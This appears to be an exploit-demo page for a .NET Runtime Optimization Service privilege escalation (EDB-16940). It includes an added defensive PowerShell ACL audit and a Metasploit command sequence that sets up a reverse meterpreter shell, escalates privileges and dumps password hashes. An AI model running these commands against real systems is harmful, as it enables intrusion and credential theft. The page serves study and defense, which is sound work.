EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
Timeline :
Vulnerability disclosed by XenoMuta on Exploit-DB on 2011-03-08
Metasploit PoC provided by David Rude on 2011-03-08
PoC provided by :
XenoMuta
David Rude
Reference(s) :
Affected version(s) :
Microsoft .NET Framework 4.0 and 2.0
Tested on Windows XP SP3 with :
Microsoft .NET Framework v2.0.50727 (mscorsvw.exe)
Description :
This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary, so a low-privileged user can replace the service executable and have it run with the service's privileges. Seems to work on Windows XP SP3, 2003 R2 & 7.
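The weakness behind this module is a service binary whose ACL grants write or modify rights to ordinary users. The PowerShell script below is an added defensive check, not part of the original post or the Metasploit module: it walks every installed service, resolves the executable from the service's PathName, and reports any "Allow" entry that gives a low-privileged principal write-class rights on that file. The $LowPrivilegedPrincipals list and the Domain Users pattern are assumptions for illustration; extend them for your environment. Run it from an elevated prompt so every binary's ACL can be read.

```powershell
# Added example (not the original post's or Metasploit's code): audit Windows
# services for binaries that non-administrative principals can modify, which
# is the condition the net_runtime_modify module relies on.
# Get-CimInstance needs PowerShell 3+; on Windows PowerShell 2 (XP/2003 era)
# substitute Get-WmiObject -Class Win32_Service.

# Assumed list of low-privileged principals; adjust for your domain.
$LowPrivilegedPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'BUILTIN\Power Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Flag any "Domain Users" group whatever its domain prefix.
$DomainUsersPattern = '\\Domain Users$'

# Rights that let a principal replace or tamper with the binary.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted and may carry arguments; keep only the executable.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Test-WeakServiceBinaryAcl {
    $findings = @()
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = [Environment]::ExpandEnvironmentVariables((Get-ServiceBinaryPath $svc.PathName))
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        try { $acl = Get-Acl -LiteralPath $exe } catch { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $id = $ace.IdentityReference.Value
            $lowPriv = ($LowPrivilegedPrincipals -contains $id) -or ($id -match $DomainUsersPattern)
            if (-not $lowPriv) { continue }
            if (($ace.FileSystemRights -band $WriteRights) -ne 0) {
                $findings += [PSCustomObject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Binary    = $exe
                    Principal = $id
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
    return $findings
}

# Each row is a service whose executable a low-privileged account can rewrite;
# a hit on a service running as LocalSystem is a local privilege escalation path.
Test-WeakServiceBinaryAcl | Format-Table -AutoSize
```

A hit for mscorsvw.exe on the listed Framework versions reproduces the condition this page describes; the fix is to restore administrator-only write access on the binary (and its directory) or apply the vendor update, then re-run the script to confirm the entry is gone.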
Commands :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background
use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit
sessions -i 2
getuid
hashdump
I recommend reading these related posts:
- MS10-042 : Microsoft Windows Help Center XSS and Command Execution
- MS08-067 : Microsoft Server Service Relative Path Stack Corruption
- MS10-046 : Microsoft Windows Shell LNK Execution
- MS11-006 : Windows Thumbnails CreateSizedDIBSECTION Stack Buffer Overflow
- Microsoft WMI Administration Tools ActiveX Buffer Overflow
- MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability
- MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo
- MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo
- CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo